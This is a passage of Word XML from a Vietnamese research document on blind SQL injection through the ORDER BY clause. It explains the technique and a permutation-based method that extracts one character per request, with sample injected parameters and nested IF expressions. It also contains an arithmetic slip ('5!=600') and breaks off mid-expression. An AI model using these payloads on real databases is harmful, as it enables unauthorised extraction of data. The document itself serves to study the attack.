      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>không</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thấy được dữ liệu được trích xuất từ CSDL. Thay vào đó, bằng cách sử dụng giá trị điều kiện trong truy vấn, từ đó dẫn đến sai khác trong nội dung trả về. Kẻ tấn công thực hiện phân tích kết quả trả về từ phản hồi trả lời đúng và trả lời sai để tìm ra sự khác biệt. Sư khác biệt đó có thể về checksum, cấu trúc HTML, từ khóa hoặc hành vi (Ví dụ như thời gian trả về).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Bằng cách phân tích sự sai khác này, kẻ tấn công có thể trích xuất ra được dữ liệu mong muốn. Đi sâu vào phân tích cách sử dụng mệnh đề Order by, có thể thấy phía sau mệnh đề này có 03 dạng: col_name, expr, position. Nếu như col_name (Tên cột), hay position (số thứ tự) là một hằng số không thể can thiệp, thì việc cho phép expr (biểu thức) sẽ cho ta nhiều khả năng thực hiện tính toán sau mệnh đề ORDER BY. Trong trường hợp này, kẻ tấn công sẽ kết hợp sử dụng giá trị điều kiện và sắp xếp dữ liệu để làm sai lệch </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hiển thị của ứng dụng. Ví dụ để kiểm tra chữ cái đầu của giá trị tên database có phải là ký tự ‘A’ hay không, kẻ tấn công sẽ sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>?sort= if((substr(database(),1,1)='A'),id,point)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Khi đó câu truy vấn được thực thi sẽ là:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>SELECT * FROM users ORDER BY if(substr(database,1,1)=’A’,id,point)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Trong đó, đoạn substr(database,1,1)=’A’ là giá trị điều kiện kiểm tra xem chữ cái đầu của giá trị tên database có phải là ký tự ‘A’ hay không, nếu đúng sẽ trả về id (thực hiện sắp xếp theo cột id), nếu sai sẽ trả về point (thực hiện sắp xếp theo cột point). Trong ví dụ, tên database là: sql_orderby nên ký tự trả về sẽ là ‘s’:</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2D8A1694" wp14:editId="259106F5">
            <wp:extent cx="4598290" cy="215265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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4601567" cy="2154184"/>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86" w:name="_Toc458436431"/>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19</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Trường hợp đúng (‘s’ = ‘s’). Sắp xếp theo cột id.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>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47C49AA7" wp14:editId="5C6DD49B">
            <wp:extent cx="4523434" cy="21431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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4539230" cy="2150609"/>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87" w:name="_Toc458436432"/>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20</w:t>
      </w:r>
      <w:r w:rsidR="00B70950" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trường hợp đúng (‘s’ != ‘A’). Sắp xếp theo cột point.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Trong ví dụ trên, nếu trường hợp đúng, dữ liệu sẽ trả về dòng có id là 1 lên trước dòng id là 2, nếu sai thì dữ liệu trả về dòng có id là 2 lên trước dòng id là 1. Bằng việc phân tích các dữ liệu trả về này, kẻ tấn công sẽ biết được tra chữ cái đầu của giá trị tên database có phải là ký tự ‘A’ hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00E64461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc459374340"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Kỹ thuật tối ưu dựa trên tối ưu hóa nội dung trả về</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004B4347">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong quá trình nghiên cứu về tối ưu tấ</w:t>
      </w:r>
      <w:r w:rsidR="00B10C08">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n công Blind SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thấy rằng, mỗi yêu cầu gử</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>i lên chỉ có thể có 2 hai khả năng trả về: Đúng hoặc sai. Do đó số lượng yêu cầu cần gửi đi luôn là số logarit cơ số 2 của số lượng phần tử tập ký tự cần kiểm tra. Các kỹ thuật tối ưu hóa thường đi theo hướng giới hạn tập ký tự cần kiểm tra, hoặc tối ưu hóa thuật toán tìm kiếm. Một hướng tiếp cận khác là làm thế nào đó trong một yêu cầu gửi đi có thể nhận về nhiều hơn 2 trạng thái trả về.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Khi khai thác lỗ hổng Blind SQL trong mệnh đề Order by ở trên, </w:t>
      </w:r>
      <w:r w:rsidR="00FB590B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đang sử dụng việc sắp xếp dữ liệu theo cột nào để nhận biết đúng/sai trong nội dung trả về. Như vậy, giả sử trong bảng dữ liệu trả về có 128 cột và việc sắp xếp theo 128 cột trả về 128 nội dung có thứ tự khác nhau thì hoàn toàn trong một yêu cầu có thể lấy về được một ký tự. Tất nhiên, trong thực tế việc một bảng có 128 cột, cũng như có thể đảm bảo 128 nội dung trả về có thứ tự khác nhau hoàn toàn là rất khó. Tuy nhiên, ý tưởng sắp xếp lại nội dung trả về dựa để có nhiều hơn số trạng thái trả về chính là ý tưởng chính cho nội dung tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Quá trình DBMS thực hiện lệnh ORDER BY có thể được mô tả đơn giản như sau: Sauk hi DMBS thực hiện câu lệnh truy vấn (đến hết mệnh đề WHERE), kết quả truy vấn này được đặt trong vào trong một “bảng”, hoặc “view”. Tiếp theo, đối với mỗi dòng (row) của kết quả, DBMS tiếp tục thực hiện biểu thức (expr) nằm trong mệnh đề ORDER BY. Kết quả của expr này sẽ được đặt trong một “cột” (column) ảo, hoặc một giá trị ảo của row đó. Cuối cùng, DMBS thực hiện sắp xếp thứ tự các row (tăng dần/giảm dần) theo thứ tự đó. Có thể thấy rằ</w:t>
      </w:r>
      <w:r w:rsidR="00FB590B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ng, khi</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực hiện ORDER BY id, thì một cột id’ ảo được sinh ra, giá trị của mỗi ô id` bằng ô id của hàng đó. DBMS sẽ căn cứ cột id’ để thực hiện thuật toán sắp xếp. Tương tự, khi thực hiện lệnh ORDER BY if(substr(database,1,1)=’A’,id,point) ở tr</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ên, DBMS sinh ra 1 cột ảo, tạm gọi là sort. Giá trị ô sort này bằng ô id của row đó nếu chữ cái đầu tiên của biến database là A, bằng ô point nếu chữ cái đó không phải là A.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nhận thấy rằng giá trị trả về đề sắp xếp (cột ảo được sinh ra) đang là chung cho tất cả các row. Giả sử, có cách nào đó để làm cho mỗi row này có giá trị ảo đó khác nhau, và giá trị này được điều khiển bởi ký tự cần lấy thì hoàn toàn có thể dùng cách sắp xếp để thực hiện trích xuất dữ liệu mà không cần dùng đến 128 cột như ý tưởng ở trên.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00603AE9" w:rsidRPr="00603AE9" w:rsidRDefault="00603AE9" w:rsidP="00603AE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc458409295"/>
      <w:bookmarkStart w:id="90" w:name="_Toc458409365"/>
      <w:bookmarkStart w:id="91" w:name="_Toc458433491"/>
      <w:bookmarkStart w:id="92" w:name="_Toc459373908"/>
      <w:bookmarkStart w:id="93" w:name="_Toc459373968"/>
      <w:bookmarkStart w:id="94" w:name="_Toc459374341"/>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w:rsidR="00603AE9" w:rsidRPr="00603AE9" w:rsidRDefault="00603AE9" w:rsidP="00603AE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc458409296"/>
      <w:bookmarkStart w:id="96" w:name="_Toc458409366"/>
      <w:bookmarkStart w:id="97" w:name="_Toc458433492"/>
      <w:bookmarkStart w:id="98" w:name="_Toc459373909"/>
      <w:bookmarkStart w:id="99" w:name="_Toc459373969"/>
      <w:bookmarkStart w:id="100" w:name="_Toc459374342"/>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkEnd w:id="96"/>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00603AE9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc459374343"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phương pháp sắp xếp và trích xuất dựa trên thứ tự trả về của dữ liệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ở mục trên, tác giả đã trình bày về ý tưởng sắp xếp nội dung trả về theo kết quả của câu truy vấn. Ở phương pháp truyền thống: câu truy vấn chính là câu điều kiện, kết quả trả về đúng/sai. Nếu kết quả điều kiện đúng, trả về nội dung sắp xếp theo cột A, nếu kết quả điều kiện sai, trả về nội dung sắp xếp theo cột B. Ý tưởng mới đưa ra là làm cho cột ảo được sinh ra bởi biểu thức trong mệnh đề ORDER BY có giá trị khác nhau, tương ứng với ký tự cần lấy (hoặc một bit của ký tự cần lấy). Giả sử kết quả trả về n row, và các row này có giá trị id tăng liên tục (từ 1 đến n). Số cách sắp xếp không lặp là số hoán vị của số phần tử. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C821346" wp14:editId="252A63E2">
            <wp:extent cx="1123950" cy="334010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="Picture" descr=" P(n,r) = \frac{n!}{(n-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n,r) = \frac{n!}{(n-r)!} "/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1123950" cy="334010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Với n là số phần tử, r là số phẩn tử trong hoán vị. Vì n=r nên số hoán vị là n!.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu n=1, ta có 1 cách sắp xếp: 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu n=2, ta có 2 cách sắp xếp: 1 2 và 2 1 (quay lại cách khai thác truyền thống)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu n=3, ta có 3!=6 cách sắp xếp: 1 2 3, 1 3 2, 2 1 3, 2 3 1, 3 1 2, 3 2 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu n=4, ta có 4!=24 cách sắp xếp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu n=5, ta có 5!=120 cách sắp xếp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nếu n=6, ta có 5!=600 cách sắp xếp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ta chọn n=5 để chỉ lấy các ký tự nhìn thấy được. Với 120 cách sắp xếp, tương ứng với 120 ký tự có thể lấy được:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="98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170"/>
        <w:gridCol w:w="1890"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="1710"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>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3006E8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Giá trị char</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,id=1 )</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,id=4)</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4F69FA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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120</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="189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71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r>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Expr(id) là biểu thức trong mệnh đề ORDER BY, nhận đầu vào là số id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Biểu thức trong mệnh đề ORDER BY có thể xây dựng như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>IF(ASCII(substr(database,1,1))=</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>#Nếu mã ASCII ký tự đầu tiên là 1</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If(id=1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Nếu là row có id là 1, trả về 1 (cho giá trị ô trong cột ảo để sắp xếp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Nếu không phải là 1, xem có phải là 2 không</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If(id=2),</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Nếu là row có id là 2, trả về 2</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2,</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Nếu không phải là 2, xem có phải là 3 không</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Làm tương tự cho đến hết id=5</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ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>#Nếu mã ASCII ký tự đầu tiên không phải là 1</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IF(ASCII(substr(database,1,1))=1,</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If(id=1,</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 Lần lượt kiểm tra row id, tương tự như ở trường hợp ASCII=1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
